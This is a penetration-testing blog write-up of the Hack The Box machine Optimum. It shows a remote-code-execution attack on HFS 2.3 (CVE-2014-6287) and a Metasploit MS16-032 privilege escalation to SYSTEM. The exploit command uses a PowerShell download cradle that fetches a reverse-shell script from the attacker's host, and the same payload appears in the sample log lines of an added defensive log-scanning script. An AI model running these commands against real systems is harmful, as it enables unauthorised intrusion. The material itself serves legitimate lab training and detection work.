Path to OSCP: Optimum

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Next up is Optimum. Nmap as always:

u01@nostromo:~$ sudo nmap -p- -A optimum.htb -oA HTB/optimum/optimum
[sudo] password for u01: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-02 14:43 EDT
Nmap scan report for optimum.htb (10.10.10.8)
Host is up (0.040s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (87%), Microsoft Windows Server 2012 R2 (87%), Microsoft Windows Server 2012 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 41.48 ms 10.10.14.1
2 41.54 ms optimum.htb (10.10.10.8)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.45 seconds

A Windows box with just port 80 exposed, running HFS (HTTP File Server) 2.3.

Searchsploit shows a potential RCE Python script for this version, exploiting CVE-2014-6287:

u01@nostromo:~$ searchsploit httpfileserver
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------

The script requires a reverse shell as its payload. The example given in the script mentions mini-reverse.ps1, so I keep things simple and find that on GitHub.

With the necessary IP and port modified, I fire off the Python script and we’re given a link to trigger the payload.

u01@nostromo:~/HTB/optimum$ python3 49125.py optimum.htb 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:8888/mini-reverse.ps1')"

With a netcat listener open, we click the link and get a shell as user optimum\kostas:

u01@nostromo:~$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.8] 49167
> whoami
optimum\kostas
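As an added defender-side example (not from the original post or the 49125.py script), here is a small Python scanner that flags the shape of a CVE-2014-6287 request in constructed access-log lines: a percent-encoded null byte in the search parameter followed by an HFS macro marker, plus the PowerShell download cradle the post used as its payload. The log lines, their common-log-format layout and the indicator names are my assumptions; real HFS logs may be laid out differently.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in common log format (not captured from the
# box). Lines 2 and 3 are shaped like CVE-2014-6287 requests: a null byte
# (%00) in the search parameter followed by an HFS macro; line 3 carries the
# same PowerShell download cradle the post used as its payload.
SAMPLE_LOG = """\
10.10.14.12 - - [02/Sep/2023:14:43:01 -0400] "GET / HTTP/1.1" 200 1742
10.10.14.12 - - [02/Sep/2023:14:50:12 -0400] "GET /?search=%00{.exec|cmd.exe.} HTTP/1.1" 200 0
10.10.14.12 - - [02/Sep/2023:14:50:13 -0400] "GET /?search=%00{.exec|powershell.exe+IEX+(New-Object+Net.WebClient).DownloadString('http://10.10.14.12:8888/mini-reverse.ps1').} HTTP/1.1" 200 0
10.10.14.12 - - [02/Sep/2023:14:51:00 -0400] "GET /?search=report.pdf HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" (?P<status>\d{3})'
)

# A PowerShell download cradle inside a query string is suspicious on its own,
# independent of the HFS bug.
CRADLE_RE = re.compile(r"(?i)downloadstring|invoke-expression|\biex\b")


def classify_request(target: str) -> list[str]:
    """Return the indicators found in one request target; [] means clean."""
    reasons = []
    query = urlsplit(target).query
    # parse_qs percent-decodes, so an encoded %00 becomes a real NUL here.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if "\x00" in value:
                reasons.append(f"null byte in parameter '{name}'")
            if "{." in value:
                reasons.append(f"HFS macro marker in parameter '{name}'")
            if CRADLE_RE.search(value):
                reasons.append(f"PowerShell download cradle in parameter '{name}'")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Scan log text and return one finding per request that carries indicators."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["target"])
        if reasons:
            findings.append(
                {"ip": m["ip"], "time": m["ts"], "target": m["target"], "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['target']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

The null-byte check is the one that matters for this CVE; the macro and cradle checks are there so a single request lights up more than one indicator and a false positive on "{." alone is easy to triage. Upgrading HFS past 2.3 (the vulnerable 2.3x line) removes the bug itself.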

We grab the user.txt flag from this directory and begin some manual enumeration.

The shell is pretty flaky and difficult to use, with systeminfo giving fairly garbled output. Still, it’s enough to grab the OS build (Microsoft Windows Server 2012 R2 Standard 6.3.9600 Build 9600), and searching for that build alongside “exploit” leads us to Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) – Local Privilege Escalation (MS16-032) (PowerShell) – Windows local Exploit (exploit-db.com).
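Since a garbled systeminfo was still enough to recover the build, here is an added example (mine, not from the post) of a Python check that parses a constructed systeminfo excerpt for the OS version and installed hotfixes and reports whether the MS16-032 security update (KB3139914 on Windows Server 2012 R2) is present. The sample text and its hotfix list are constructed; the KB number is the bulletin's real one for this SKU.

```python
import re

# Constructed systeminfo excerpt (not the output captured from the box): the
# OS lines match the build the post reports; the hotfix list is invented.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB3012702
                           [03]: KB3185279
Network Card(s):           1 NIC(s) Installed.
"""

# Security update that ships the MS16-032 fix for Windows Server 2012 R2;
# other Windows releases may have received a different KB number.
MS16_032_KB_2012R2 = "KB3139914"

# Kernel versions covered by the bulletin (Vista/2008 through 10/2012 R2).
AFFECTED_VERSIONS = {(6, 0), (6, 1), (6, 2), (6, 3), (10, 0)}


def parse_systeminfo(text: str) -> dict:
    """Pull OS name, version tuple and installed KB set out of systeminfo output."""
    name = re.search(r"^OS Name:\s+(.+?)\s*$", text, re.M)
    version = re.search(r"^OS Version:\s+(\d+)\.(\d+)\.(\d+)", text, re.M)
    if not (name and version):
        raise ValueError("OS Name / OS Version lines not found")
    hotfixes = set(re.findall(r"\[\d+\]:\s*(KB\d+)", text))
    return {
        "os_name": name.group(1),
        "version": tuple(int(x) for x in version.groups()),
        "hotfixes": hotfixes,
    }


def assess_ms16_032(info: dict) -> dict:
    """Report whether the host is in scope for MS16-032 and whether the fix is listed."""
    major, minor, _build = info["version"]
    in_scope = (major, minor) in AFFECTED_VERSIONS
    fix_present = MS16_032_KB_2012R2 in info["hotfixes"]
    if not in_scope:
        verdict = "OS version outside MS16-032 scope"
    elif fix_present:
        verdict = f"{MS16_032_KB_2012R2} installed"
    else:
        # On 2012 R2 the fix was later folded into monthly rollups, so a missing
        # standalone KB means "verify against the rollup baseline", not
        # "definitely vulnerable".
        verdict = f"{MS16_032_KB_2012R2} missing; confirm against monthly rollup baseline"
    return {"in_scope": in_scope, "fix_present": fix_present, "verdict": verdict}


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["os_name"], ".".join(map(str, info["version"])))
    print(assess_ms16_032(info)["verdict"])
```

Run against a real systeminfo dump, the hotfix regex tolerates the ragged indentation a flaky shell produces, since it keys only on the "[NN]: KBxxxxxxx" pairs rather than on column positions.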

I upload the PowerShell script in the same manner as before with certutil, but can’t get the exploit to work. I suspect it may be something to do with the foothold shell I have.

So, not wanting to waste too much time here, I revert to Metasploit, which has a module for MS16-032:

msf6 > search ms16_032

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation

We first need an established session for this module, so we circle back and re-exploit the same HFS vulnerability from MSF:

msf6 exploit(windows/http/rejetto_hfs_exec) > run

[*] Started reverse TCP handler on 10.10.14.12:4444 
[*] Using URL: http://10.10.14.12:8080/qCpgrJgE
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /qCpgrJgE
[*] Sending stage (175686 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\zHFtmjdvIWPx.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.14.12:4444 -> 10.10.10.8:49270) at 2023-09-02 15:52:20 -0400
[*] Server stopped.

meterpreter > 
Background session 1? [y/N]

Plugging the session ID into the ms16_032 module, we run the exploit, gain SYSTEM and retrieve the root.txt flag:

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 10.10.14.12:4444 
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\nQzEgbj.ps1...
[*] Compressing script contents...
[+] Compressed size: 3768
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___ 
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|

[by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1716

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+ $oc = [Ntdll]::NtImpersonateThread($d87Xk, $d87Xk, [ref]$gxhzy)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (gxhzy:VariablePath) [], Runti 
meException
+ FullyQualifiedErrorId : NonExistingVariableReference

[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+ $oc = [Advapi32]::DuplicateToken($jWvl, 2, [ref]$u3Ws)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument

[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

JBDPVCnqxwZX6u1KPztfm6WuZQGfdmCr
[+] Executed on target machine.
[*] Sending stage (175686 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.12:4444 -> 10.10.10.8:49271) at 2023-09-02 15:54:36 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\nQzEgbj.ps1

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

A little disappointed that I couldn’t root this without using Metasploit; I definitely need to work on my Windows-based reverse shell commands, but it’s best to keep moving on at this stage.
